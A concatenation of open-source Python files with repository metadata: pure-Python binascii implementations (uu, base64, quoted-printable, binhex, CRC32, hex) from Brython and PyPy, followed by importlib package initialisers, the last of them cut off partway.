-1,10,11,12, 13,14,15,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,10,11,12, 13,14,15,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1
]
def a2b_hex(t):
result = []
def pairs_gen(s):
if isinstance(s, bytes) or isinstance(s, bytearray):
conv = lambda x:x
else:
conv = lambda x:ord(x)
while s:
try:
yield table_hex[conv(s[0])], table_hex[conv(s[1])]
except IndexError:
if len(s):
raise TypeError('Odd-length string')
return
s = s[2:]
for a, b in pairs_gen(t):
if a < 0 or b < 0:
raise TypeError('Non-hexadecimal digit found')
result.append(chr((a << 4) + b))
return bytes(''.join(result), __BRYTHON__.charset)
unhexlify = a2b_hex
| {
"repo_name": "jonathanverner/brython",
"path": "www/src/Lib/binascii.py",
"copies": "2",
"size": "25218",
"license": "bsd-3-clause",
"hash": 2601331929557310500,
"line_mean": 32.8042895442,
"line_max": 85,
"alpha_frac": 0.4936553256,
"autogenerated": false,
"ratio": 2.5976514215080346,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.40913067471080344,
"avg_score": null,
"num_lines": null
} |
"""A pure Python implementation of binascii.
Rather slow and buggy in corner cases.
PyPy provides an RPython version too.
"""
class Error(Exception):
pass
class Done(Exception):
pass
class Incomplete(Exception):
pass
def a2b_uu(s):
if not s:
return ''
length = (ord(s[0]) - 0x20) % 64
def quadruplets_gen(s):
while s:
try:
yield ord(s[0]), ord(s[1]), ord(s[2]), ord(s[3])
except IndexError:
s += ' '
yield ord(s[0]), ord(s[1]), ord(s[2]), ord(s[3])
return
s = s[4:]
try:
result = [''.join(
[chr((A - 0x20) << 2 | (((B - 0x20) >> 4) & 0x3)),
chr(((B - 0x20) & 0xf) << 4 | (((C - 0x20) >> 2) & 0xf)),
chr(((C - 0x20) & 0x3) << 6 | ((D - 0x20) & 0x3f))
]) for A, B, C, D in quadruplets_gen(s[1:].rstrip())]
except ValueError:
raise Error('Illegal char')
result = ''.join(result)
trailingdata = result[length:]
# if trailingdata.strip('\x00'):
# raise Error('Trailing garbage')
result = result[:length]
if len(result) < length:
result += ((length - len(result)) * '\x00')
return result
def b2a_uu(s):
length = len(s)
if length > 45:
raise Error('At most 45 bytes at once')
def triples_gen(s):
while s:
try:
yield ord(s[0]), ord(s[1]), ord(s[2])
except IndexError:
s += '\0\0'
yield ord(s[0]), ord(s[1]), ord(s[2])
return
s = s[3:]
result = [''.join(
[chr(0x20 + (( A >> 2 ) & 0x3F)),
chr(0x20 + (((A << 4) | ((B >> 4) & 0xF)) & 0x3F)),
chr(0x20 + (((B << 2) | ((C >> 6) & 0x3)) & 0x3F)),
chr(0x20 + (( C ) & 0x3F))])
for A, B, C in triples_gen(s)]
return chr(ord(' ') + (length & 077)) + ''.join(result) + '\n'
table_a2b_base64 = {
'A': 0,
'B': 1,
'C': 2,
'D': 3,
'E': 4,
'F': 5,
'G': 6,
'H': 7,
'I': 8,
'J': 9,
'K': 10,
'L': 11,
'M': 12,
'N': 13,
'O': 14,
'P': 15,
'Q': 16,
'R': 17,
'S': 18,
'T': 19,
'U': 20,
'V': 21,
'W': 22,
'X': 23,
'Y': 24,
'Z': 25,
'a': 26,
'b': 27,
'c': 28,
'd': 29,
'e': 30,
'f': 31,
'g': 32,
'h': 33,
'i': 34,
'j': 35,
'k': 36,
'l': 37,
'm': 38,
'n': 39,
'o': 40,
'p': 41,
'q': 42,
'r': 43,
's': 44,
't': 45,
'u': 46,
'v': 47,
'w': 48,
'x': 49,
'y': 50,
'z': 51,
'0': 52,
'1': 53,
'2': 54,
'3': 55,
'4': 56,
'5': 57,
'6': 58,
'7': 59,
'8': 60,
'9': 61,
'+': 62,
'/': 63,
'=': 0,
}
def a2b_base64(s):
if not isinstance(s, (str, unicode)):
raise TypeError("expected string or unicode, got %r" % (s,))
s = s.rstrip()
# clean out all invalid characters, this also strips the final '=' padding
# check for correct padding
def next_valid_char(s, pos):
for i in range(pos + 1, len(s)):
c = s[i]
if c < '\x7f':
try:
table_a2b_base64[c]
return c
except KeyError:
pass
return None
quad_pos = 0
leftbits = 0
leftchar = 0
res = []
for i, c in enumerate(s):
if c > '\x7f' or c == '\n' or c == '\r' or c == ' ':
continue
if c == '=':
if quad_pos < 2 or (quad_pos == 2 and next_valid_char(s, i) != '='):
continue
else:
leftbits = 0
break
try:
next_c = table_a2b_base64[c]
except KeyError:
continue
quad_pos = (quad_pos + 1) & 0x03
leftchar = (leftchar << 6) | next_c
leftbits += 6
if leftbits >= 8:
leftbits -= 8
res.append((leftchar >> leftbits & 0xff))
leftchar &= ((1 << leftbits) - 1)
if leftbits != 0:
raise Error('Incorrect padding')
return ''.join([chr(i) for i in res])
table_b2a_base64 = \
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
def b2a_base64(s):
length = len(s)
final_length = length % 3
def triples_gen(s):
while s:
try:
yield ord(s[0]), ord(s[1]), ord(s[2])
except IndexError:
s += '\0\0'
yield ord(s[0]), ord(s[1]), ord(s[2])
return
s = s[3:]
a = triples_gen(s[ :length - final_length])
result = [''.join(
[table_b2a_base64[( A >> 2 ) & 0x3F],
table_b2a_base64[((A << 4) | ((B >> 4) & 0xF)) & 0x3F],
table_b2a_base64[((B << 2) | ((C >> 6) & 0x3)) & 0x3F],
table_b2a_base64[( C ) & 0x3F]])
for A, B, C in a]
final = s[length - final_length:]
if final_length == 0:
snippet = ''
elif final_length == 1:
a = ord(final[0])
snippet = table_b2a_base64[(a >> 2 ) & 0x3F] + \
table_b2a_base64[(a << 4 ) & 0x3F] + '=='
else:
a = ord(final[0])
b = ord(final[1])
snippet = table_b2a_base64[(a >> 2) & 0x3F] + \
table_b2a_base64[((a << 4) | (b >> 4) & 0xF) & 0x3F] + \
table_b2a_base64[(b << 2) & 0x3F] + '='
return ''.join(result) + snippet + '\n'
def a2b_qp(s, header=False):
inp = 0
odata = []
while inp < len(s):
if s[inp] == '=':
inp += 1
if inp >= len(s):
break
# Soft line breaks
if (s[inp] == '\n') or (s[inp] == '\r'):
if s[inp] != '\n':
while inp < len(s) and s[inp] != '\n':
inp += 1
if inp < len(s):
inp += 1
elif s[inp] == '=':
# broken case from broken python qp
odata.append('=')
inp += 1
elif s[inp] in hex_numbers and s[inp + 1] in hex_numbers:
ch = chr(int(s[inp:inp+2], 16))
inp += 2
odata.append(ch)
else:
odata.append('=')
elif header and s[inp] == '_':
odata.append(' ')
inp += 1
else:
odata.append(s[inp])
inp += 1
return ''.join(odata)
def b2a_qp(data, quotetabs=False, istext=True, header=False):
"""quotetabs=True means that tab and space characters are always
quoted.
istext=False means that \r and \n are treated as regular characters
header=True encodes space characters with '_' and requires
real '_' characters to be quoted.
"""
MAXLINESIZE = 76
# See if this string is using CRLF line ends
lf = data.find('\n')
crlf = lf > 0 and data[lf-1] == '\r'
inp = 0
linelen = 0
odata = []
while inp < len(data):
c = data[inp]
if (c > '~' or
c == '=' or
(header and c == '_') or
(c == '.' and linelen == 0 and (inp+1 == len(data) or
data[inp+1] == '\n' or
data[inp+1] == '\r')) or
(not istext and (c == '\r' or c == '\n')) or
((c == '\t' or c == ' ') and (inp + 1 == len(data))) or
(c <= ' ' and c != '\r' and c != '\n' and
(quotetabs or (not quotetabs and (c != '\t' and c != ' '))))):
linelen += 3
if linelen >= MAXLINESIZE:
odata.append('=')
if crlf: odata.append('\r')
odata.append('\n')
linelen = 3
odata.append('=' + two_hex_digits(ord(c)))
inp += 1
else:
if (istext and
(c == '\n' or (inp+1 < len(data) and c == '\r' and
data[inp+1] == '\n'))):
linelen = 0
# Protect against whitespace on end of line
if (len(odata) > 0 and
(odata[-1] == ' ' or odata[-1] == '\t')):
ch = ord(odata[-1])
odata[-1] = '='
odata.append(two_hex_digits(ch))
if crlf: odata.append('\r')
odata.append('\n')
if c == '\r':
inp += 2
else:
inp += 1
else:
if (inp + 1 < len(data) and
data[inp+1] != '\n' and
(linelen + 1) >= MAXLINESIZE):
odata.append('=')
if crlf: odata.append('\r')
odata.append('\n')
linelen = 0
linelen += 1
if header and c == ' ':
c = '_'
odata.append(c)
inp += 1
return ''.join(odata)
hex_numbers = '0123456789ABCDEF'
def hex(n):
if n == 0:
return '0'
if n < 0:
n = -n
sign = '-'
else:
sign = ''
arr = []
def hex_gen(n):
""" Yield a nibble at a time. """
while n:
yield n % 0x10
n = n / 0x10
for nibble in hex_gen(n):
arr = [hex_numbers[nibble]] + arr
return sign + ''.join(arr)
def two_hex_digits(n):
return hex_numbers[n / 0x10] + hex_numbers[n % 0x10]
def strhex_to_int(s):
i = 0
for c in s:
i = i * 0x10 + hex_numbers.index(c)
return i
hqx_encoding = '!"#$%&\'()*+,-012345689@ABCDEFGHIJKLMNPQRSTUVXYZ[`abcdefhijklmpqr'
DONE = 0x7f
SKIP = 0x7e
FAIL = 0x7d
table_a2b_hqx = [
#^@ ^A ^B ^C ^D ^E ^F ^G
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
#\b \t \n ^K ^L \r ^N ^O
FAIL, FAIL, SKIP, FAIL, FAIL, SKIP, FAIL, FAIL,
#^P ^Q ^R ^S ^T ^U ^V ^W
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
#^X ^Y ^Z ^[ ^\ ^] ^^ ^_
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
# ! " # $ % & '
FAIL, 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06,
#( ) * + , - . /
0x07, 0x08, 0x09, 0x0A, 0x0B, 0x0C, FAIL, FAIL,
#0 1 2 3 4 5 6 7
0x0D, 0x0E, 0x0F, 0x10, 0x11, 0x12, 0x13, FAIL,
#8 9 : ; < = > ?
0x14, 0x15, DONE, FAIL, FAIL, FAIL, FAIL, FAIL,
#@ A B C D E F G
0x16, 0x17, 0x18, 0x19, 0x1A, 0x1B, 0x1C, 0x1D,
#H I J K L M N O
0x1E, 0x1F, 0x20, 0x21, 0x22, 0x23, 0x24, FAIL,
#P Q R S T U V W
0x25, 0x26, 0x27, 0x28, 0x29, 0x2A, 0x2B, FAIL,
#X Y Z [ \ ] ^ _
0x2C, 0x2D, 0x2E, 0x2F, FAIL, FAIL, FAIL, FAIL,
#` a b c d e f g
0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, FAIL,
#h i j k l m n o
0x37, 0x38, 0x39, 0x3A, 0x3B, 0x3C, FAIL, FAIL,
#p q r s t u v w
0x3D, 0x3E, 0x3F, FAIL, FAIL, FAIL, FAIL, FAIL,
#x y z { | } ~ ^?
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
]
def a2b_hqx(s):
result = []
def quadruples_gen(s):
t = []
for c in s:
res = table_a2b_hqx[ord(c)]
if res == SKIP:
continue
elif res == FAIL:
raise Error('Illegal character')
elif res == DONE:
yield t
raise Done
else:
t.append(res)
if len(t) == 4:
yield t
t = []
yield t
done = 0
try:
for snippet in quadruples_gen(s):
length = len(snippet)
if length == 4:
result.append(chr(((snippet[0] & 0x3f) << 2) | (snippet[1] >> 4)))
result.append(chr(((snippet[1] & 0x0f) << 4) | (snippet[2] >> 2)))
result.append(chr(((snippet[2] & 0x03) << 6) | (snippet[3])))
elif length == 3:
result.append(chr(((snippet[0] & 0x3f) << 2) | (snippet[1] >> 4)))
result.append(chr(((snippet[1] & 0x0f) << 4) | (snippet[2] >> 2)))
elif length == 2:
result.append(chr(((snippet[0] & 0x3f) << 2) | (snippet[1] >> 4)))
except Done:
done = 1
except Error:
raise
return (''.join(result), done)
def b2a_hqx(s):
result =[]
def triples_gen(s):
while s:
try:
yield ord(s[0]), ord(s[1]), ord(s[2])
except IndexError:
yield tuple([ord(c) for c in s])
s = s[3:]
for snippet in triples_gen(s):
length = len(snippet)
if length == 3:
result.append(
hqx_encoding[(snippet[0] & 0xfc) >> 2])
result.append(hqx_encoding[
((snippet[0] & 0x03) << 4) | ((snippet[1] & 0xf0) >> 4)])
result.append(hqx_encoding[
(snippet[1] & 0x0f) << 2 | ((snippet[2] & 0xc0) >> 6)])
result.append(hqx_encoding[snippet[2] & 0x3f])
elif length == 2:
result.append(
hqx_encoding[(snippet[0] & 0xfc) >> 2])
result.append(hqx_encoding[
((snippet[0] & 0x03) << 4) | ((snippet[1] & 0xf0) >> 4)])
result.append(hqx_encoding[
(snippet[1] & 0x0f) << 2])
elif length == 1:
result.append(
hqx_encoding[(snippet[0] & 0xfc) >> 2])
result.append(hqx_encoding[
((snippet[0] & 0x03) << 4)])
return ''.join(result)
crctab_hqx = [
0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50a5, 0x60c6, 0x70e7,
0x8108, 0x9129, 0xa14a, 0xb16b, 0xc18c, 0xd1ad, 0xe1ce, 0xf1ef,
0x1231, 0x0210, 0x3273, 0x2252, 0x52b5, 0x4294, 0x72f7, 0x62d6,
0x9339, 0x8318, 0xb37b, 0xa35a, 0xd3bd, 0xc39c, 0xf3ff, 0xe3de,
0x2462, 0x3443, 0x0420, 0x1401, 0x64e6, 0x74c7, 0x44a4, 0x5485,
0xa56a, 0xb54b, 0x8528, 0x9509, 0xe5ee, 0xf5cf, 0xc5ac, 0xd58d,
0x3653, 0x2672, 0x1611, 0x0630, 0x76d7, 0x66f6, 0x5695, 0x46b4,
0xb75b, 0xa77a, 0x9719, 0x8738, 0xf7df, 0xe7fe, 0xd79d, 0xc7bc,
0x48c4, 0x58e5, 0x6886, 0x78a7, 0x0840, 0x1861, 0x2802, 0x3823,
0xc9cc, 0xd9ed, 0xe98e, 0xf9af, 0x8948, 0x9969, 0xa90a, 0xb92b,
0x5af5, 0x4ad4, 0x7ab7, 0x6a96, 0x1a71, 0x0a50, 0x3a33, 0x2a12,
0xdbfd, 0xcbdc, 0xfbbf, 0xeb9e, 0x9b79, 0x8b58, 0xbb3b, 0xab1a,
0x6ca6, 0x7c87, 0x4ce4, 0x5cc5, 0x2c22, 0x3c03, 0x0c60, 0x1c41,
0xedae, 0xfd8f, 0xcdec, 0xddcd, 0xad2a, 0xbd0b, 0x8d68, 0x9d49,
0x7e97, 0x6eb6, 0x5ed5, 0x4ef4, 0x3e13, 0x2e32, 0x1e51, 0x0e70,
0xff9f, 0xefbe, 0xdfdd, 0xcffc, 0xbf1b, 0xaf3a, 0x9f59, 0x8f78,
0x9188, 0x81a9, 0xb1ca, 0xa1eb, 0xd10c, 0xc12d, 0xf14e, 0xe16f,
0x1080, 0x00a1, 0x30c2, 0x20e3, 0x5004, 0x4025, 0x7046, 0x6067,
0x83b9, 0x9398, 0xa3fb, 0xb3da, 0xc33d, 0xd31c, 0xe37f, 0xf35e,
0x02b1, 0x1290, 0x22f3, 0x32d2, 0x4235, 0x5214, 0x6277, 0x7256,
0xb5ea, 0xa5cb, 0x95a8, 0x8589, 0xf56e, 0xe54f, 0xd52c, 0xc50d,
0x34e2, 0x24c3, 0x14a0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,
0xa7db, 0xb7fa, 0x8799, 0x97b8, 0xe75f, 0xf77e, 0xc71d, 0xd73c,
0x26d3, 0x36f2, 0x0691, 0x16b0, 0x6657, 0x7676, 0x4615, 0x5634,
0xd94c, 0xc96d, 0xf90e, 0xe92f, 0x99c8, 0x89e9, 0xb98a, 0xa9ab,
0x5844, 0x4865, 0x7806, 0x6827, 0x18c0, 0x08e1, 0x3882, 0x28a3,
0xcb7d, 0xdb5c, 0xeb3f, 0xfb1e, 0x8bf9, 0x9bd8, 0xabbb, 0xbb9a,
0x4a75, 0x5a54, 0x6a37, 0x7a16, 0x0af1, 0x1ad0, 0x2ab3, 0x3a92,
0xfd2e, 0xed0f, 0xdd6c, 0xcd4d, 0xbdaa, 0xad8b, 0x9de8, 0x8dc9,
0x7c26, 0x6c07, 0x5c64, 0x4c45, 0x3ca2, 0x2c83, 0x1ce0, 0x0cc1,
0xef1f, 0xff3e, 0xcf5d, 0xdf7c, 0xaf9b, 0xbfba, 0x8fd9, 0x9ff8,
0x6e17, 0x7e36, 0x4e55, 0x5e74, 0x2e93, 0x3eb2, 0x0ed1, 0x1ef0,
]
def crc_hqx(s, crc):
for c in s:
crc = ((crc << 8) & 0xff00) ^ crctab_hqx[((crc >> 8) & 0xff) ^ ord(c)]
return crc
def rlecode_hqx(s):
"""
Run length encoding for binhex4.
The CPython implementation does not do run length encoding
of \x90 characters. This implementation does.
"""
if not s:
return ''
result = []
prev = s[0]
count = 1
# Add a dummy character to get the loop to go one extra round.
# The dummy must be different from the last character of s.
# In the same step we remove the first character, which has
# already been stored in prev.
if s[-1] == '!':
s = s[1:] + '?'
else:
s = s[1:] + '!'
for c in s:
if c == prev and count < 255:
count += 1
else:
if count == 1:
if prev != '\x90':
result.append(prev)
else:
result += ['\x90', '\x00']
elif count < 4:
if prev != '\x90':
result += [prev] * count
else:
result += ['\x90', '\x00'] * count
else:
if prev != '\x90':
result += [prev, '\x90', chr(count)]
else:
result += ['\x90', '\x00', '\x90', chr(count)]
count = 1
prev = c
return ''.join(result)
def rledecode_hqx(s):
s = s.split('\x90')
result = [s[0]]
prev = s[0]
for snippet in s[1:]:
count = ord(snippet[0])
if count > 0:
result.append(prev[-1] * (count-1))
prev = snippet
else:
result. append('\x90')
prev = '\x90'
result.append(snippet[1:])
return ''.join(result)
crc_32_tab = [
0x00000000L, 0x77073096L, 0xee0e612cL, 0x990951baL, 0x076dc419L,
0x706af48fL, 0xe963a535L, 0x9e6495a3L, 0x0edb8832L, 0x79dcb8a4L,
0xe0d5e91eL, 0x97d2d988L, 0x09b64c2bL, 0x7eb17cbdL, 0xe7b82d07L,
0x90bf1d91L, 0x1db71064L, 0x6ab020f2L, 0xf3b97148L, 0x84be41deL,
0x1adad47dL, 0x6ddde4ebL, 0xf4d4b551L, 0x83d385c7L, 0x136c9856L,
0x646ba8c0L, 0xfd62f97aL, 0x8a65c9ecL, 0x14015c4fL, 0x63066cd9L,
0xfa0f3d63L, 0x8d080df5L, 0x3b6e20c8L, 0x4c69105eL, 0xd56041e4L,
0xa2677172L, 0x3c03e4d1L, 0x4b04d447L, 0xd20d85fdL, 0xa50ab56bL,
0x35b5a8faL, 0x42b2986cL, 0xdbbbc9d6L, 0xacbcf940L, 0x32d86ce3L,
0x45df5c75L, 0xdcd60dcfL, 0xabd13d59L, 0x26d930acL, 0x51de003aL,
0xc8d75180L, 0xbfd06116L, 0x21b4f4b5L, 0x56b3c423L, 0xcfba9599L,
0xb8bda50fL, 0x2802b89eL, 0x5f058808L, 0xc60cd9b2L, 0xb10be924L,
0x2f6f7c87L, 0x58684c11L, 0xc1611dabL, 0xb6662d3dL, 0x76dc4190L,
0x01db7106L, 0x98d220bcL, 0xefd5102aL, 0x71b18589L, 0x06b6b51fL,
0x9fbfe4a5L, 0xe8b8d433L, 0x7807c9a2L, 0x0f00f934L, 0x9609a88eL,
0xe10e9818L, 0x7f6a0dbbL, 0x086d3d2dL, 0x91646c97L, 0xe6635c01L,
0x6b6b51f4L, 0x1c6c6162L, 0x856530d8L, 0xf262004eL, 0x6c0695edL,
0x1b01a57bL, 0x8208f4c1L, 0xf50fc457L, 0x65b0d9c6L, 0x12b7e950L,
0x8bbeb8eaL, 0xfcb9887cL, 0x62dd1ddfL, 0x15da2d49L, 0x8cd37cf3L,
0xfbd44c65L, 0x4db26158L, 0x3ab551ceL, 0xa3bc0074L, 0xd4bb30e2L,
0x4adfa541L, 0x3dd895d7L, 0xa4d1c46dL, 0xd3d6f4fbL, 0x4369e96aL,
0x346ed9fcL, 0xad678846L, 0xda60b8d0L, 0x44042d73L, 0x33031de5L,
0xaa0a4c5fL, 0xdd0d7cc9L, 0x5005713cL, 0x270241aaL, 0xbe0b1010L,
0xc90c2086L, 0x5768b525L, 0x206f85b3L, 0xb966d409L, 0xce61e49fL,
0x5edef90eL, 0x29d9c998L, 0xb0d09822L, 0xc7d7a8b4L, 0x59b33d17L,
0x2eb40d81L, 0xb7bd5c3bL, 0xc0ba6cadL, 0xedb88320L, 0x9abfb3b6L,
0x03b6e20cL, 0x74b1d29aL, 0xead54739L, 0x9dd277afL, 0x04db2615L,
0x73dc1683L, 0xe3630b12L, 0x94643b84L, 0x0d6d6a3eL, 0x7a6a5aa8L,
0xe40ecf0bL, 0x9309ff9dL, 0x0a00ae27L, 0x7d079eb1L, 0xf00f9344L,
0x8708a3d2L, 0x1e01f268L, 0x6906c2feL, 0xf762575dL, 0x806567cbL,
0x196c3671L, 0x6e6b06e7L, 0xfed41b76L, 0x89d32be0L, 0x10da7a5aL,
0x67dd4accL, 0xf9b9df6fL, 0x8ebeeff9L, 0x17b7be43L, 0x60b08ed5L,
0xd6d6a3e8L, 0xa1d1937eL, 0x38d8c2c4L, 0x4fdff252L, 0xd1bb67f1L,
0xa6bc5767L, 0x3fb506ddL, 0x48b2364bL, 0xd80d2bdaL, 0xaf0a1b4cL,
0x36034af6L, 0x41047a60L, 0xdf60efc3L, 0xa867df55L, 0x316e8eefL,
0x4669be79L, 0xcb61b38cL, 0xbc66831aL, 0x256fd2a0L, 0x5268e236L,
0xcc0c7795L, 0xbb0b4703L, 0x220216b9L, 0x5505262fL, 0xc5ba3bbeL,
0xb2bd0b28L, 0x2bb45a92L, 0x5cb36a04L, 0xc2d7ffa7L, 0xb5d0cf31L,
0x2cd99e8bL, 0x5bdeae1dL, 0x9b64c2b0L, 0xec63f226L, 0x756aa39cL,
0x026d930aL, 0x9c0906a9L, 0xeb0e363fL, 0x72076785L, 0x05005713L,
0x95bf4a82L, 0xe2b87a14L, 0x7bb12baeL, 0x0cb61b38L, 0x92d28e9bL,
0xe5d5be0dL, 0x7cdcefb7L, 0x0bdbdf21L, 0x86d3d2d4L, 0xf1d4e242L,
0x68ddb3f8L, 0x1fda836eL, 0x81be16cdL, 0xf6b9265bL, 0x6fb077e1L,
0x18b74777L, 0x88085ae6L, 0xff0f6a70L, 0x66063bcaL, 0x11010b5cL,
0x8f659effL, 0xf862ae69L, 0x616bffd3L, 0x166ccf45L, 0xa00ae278L,
0xd70dd2eeL, 0x4e048354L, 0x3903b3c2L, 0xa7672661L, 0xd06016f7L,
0x4969474dL, 0x3e6e77dbL, 0xaed16a4aL, 0xd9d65adcL, 0x40df0b66L,
0x37d83bf0L, 0xa9bcae53L, 0xdebb9ec5L, 0x47b2cf7fL, 0x30b5ffe9L,
0xbdbdf21cL, 0xcabac28aL, 0x53b39330L, 0x24b4a3a6L, 0xbad03605L,
0xcdd70693L, 0x54de5729L, 0x23d967bfL, 0xb3667a2eL, 0xc4614ab8L,
0x5d681b02L, 0x2a6f2b94L, 0xb40bbe37L, 0xc30c8ea1L, 0x5a05df1bL,
0x2d02ef8dL
]
def crc32(s, crc=0):
result = 0
crc = ~long(crc) & 0xffffffffL
for c in s:
crc = crc_32_tab[(crc ^ long(ord(c))) & 0xffL] ^ (crc >> 8)
#/* Note: (crc >> 8) MUST zero fill on left
result = crc ^ 0xffffffffL
if result > (1 << 31):
result = ((result + (1<<31)) % (1<<32)) - (1<<31)
return result
def b2a_hex(s):
result = []
for char in s:
c = (ord(char) >> 4) & 0xf
if c > 9:
c = c + ord('a') - 10
else:
c = c + ord('0')
result.append(chr(c))
c = ord(char) & 0xf
if c > 9:
c = c + ord('a') - 10
else:
c = c + ord('0')
result.append(chr(c))
return ''.join(result)
hexlify = b2a_hex
table_hex = [
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,-1,-1, -1,-1,-1,-1,
-1,10,11,12, 13,14,15,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,10,11,12, 13,14,15,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1
]
def a2b_hex(t):
result = []
def pairs_gen(s):
while s:
try:
yield table_hex[ord(s[0])], table_hex[ord(s[1])]
except IndexError:
if len(s):
raise TypeError('Odd-length string')
return
s = s[2:]
for a, b in pairs_gen(t):
if a < 0 or b < 0:
raise TypeError('Non-hexadecimal digit found')
result.append(chr((a << 4) + b))
return ''.join(result)
unhexlify = a2b_hex | {
"repo_name": "corona10/grumpy",
"path": "grumpy-runtime-src/third_party/pypy/binascii.py",
"copies": "7",
"size": "24270",
"license": "apache-2.0",
"hash": -569507639079837500,
"line_mean": 32.7097222222,
"line_max": 82,
"alpha_frac": 0.4960444994,
"autogenerated": false,
"ratio": 2.5184185949984434,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.005081551954608266,
"num_lines": 720
} |
"""A pure Python implementation of import."""
__all__ = ['__import__', 'import_module', 'invalidate_caches']
# Bootstrap help #####################################################
# Until bootstrapping is complete, DO NOT import any modules that attempt
# to import importlib._bootstrap (directly or indirectly). Since this
# partially initialised package would be present in sys.modules, those
# modules would get an uninitialised copy of the source version, instead
# of a fully initialised version (either the frozen one or the one
# initialised below if the frozen one is not available).
import _imp # Just the builtin component, NOT the full Python module
import sys
from . import machinery #fix me brython
try:
import _frozen_importlib as _bootstrap
except ImportError:
from . import _bootstrap
_bootstrap._setup(sys, _imp)
else:
# importlib._bootstrap is the built-in import, ensure we don't create
# a second copy of the module.
_bootstrap.__name__ = 'importlib._bootstrap'
_bootstrap.__package__ = 'importlib'
_bootstrap.__file__ = __file__.replace('__init__.py', '_bootstrap.py')
sys.modules['importlib._bootstrap'] = _bootstrap
# To simplify imports in test code
_w_long = _bootstrap._w_long
_r_long = _bootstrap._r_long
# Fully bootstrapped at this point, import whatever you like, circular
# dependencies and startup overhead minimisation permitting :)
# Public API #########################################################
from ._bootstrap import __import__
def invalidate_caches():
"""Call the invalidate_caches() method on all meta path finders stored in
sys.meta_path (where implemented)."""
for finder in sys.meta_path:
if hasattr(finder, 'invalidate_caches'):
finder.invalidate_caches()
def find_loader(name, path=None):
"""Find the loader for the specified module.
First, sys.modules is checked to see if the module was already imported. If
so, then sys.modules[name].__loader__ is returned. If that happens to be
set to None, then ValueError is raised. If the module is not in
sys.modules, then sys.meta_path is searched for a suitable loader with the
value of 'path' given to the finders. None is returned if no loader could
be found.
Dotted names do not have their parent packages implicitly imported. You will
most likely need to explicitly import all parent packages in the proper
order for a submodule to get the correct loader.
"""
try:
loader = sys.modules[name].__loader__
if loader is None:
raise ValueError('{}.__loader__ is None'.format(name))
else:
return loader
except KeyError:
pass
return _bootstrap._find_module(name, path)
def import_module(name, package=None):
"""Import a module.
The 'package' argument is required when performing a relative import. It
specifies the package to use as the anchor point from which to resolve the
relative import to an absolute import.
"""
level = 0
if name.startswith('.'):
if not package:
raise TypeError("relative imports require the 'package' argument")
for character in name:
if character != '.':
break
level += 1
return _bootstrap._gcd_import(name[level:], package, level)
#need at least one import hook for importlib stuff to work.
from . import basehook
sys.meta_path.append(basehook.BaseHook())
| {
"repo_name": "Mozhuowen/brython",
"path": "www/src/Lib/importlib/__init__.py",
"copies": "12",
"size": "3479",
"license": "bsd-3-clause",
"hash": 2400406564722282000,
"line_mean": 34.8659793814,
"line_max": 80,
"alpha_frac": 0.6659959759,
"autogenerated": false,
"ratio": 4.392676767676767,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0012873356590673189,
"num_lines": 97
} |
"""A pure Python implementation of import."""
__all__ = ['__import__', 'import_module', 'invalidate_caches', 'reload']
# Bootstrap help #####################################################
# Until bootstrapping is complete, DO NOT import any modules that attempt
# to import importlib._bootstrap (directly or indirectly). Since this
# partially initialised package would be present in sys.modules, those
# modules would get an uninitialised copy of the source version, instead
# of a fully initialised version (either the frozen one or the one
# initialised below if the frozen one is not available).
import _imp # Just the builtin component, NOT the full Python module
import sys
try:
import _frozen_importlib as _bootstrap
except ImportError:
from . import _bootstrap
_bootstrap._setup(sys, _imp)
else:
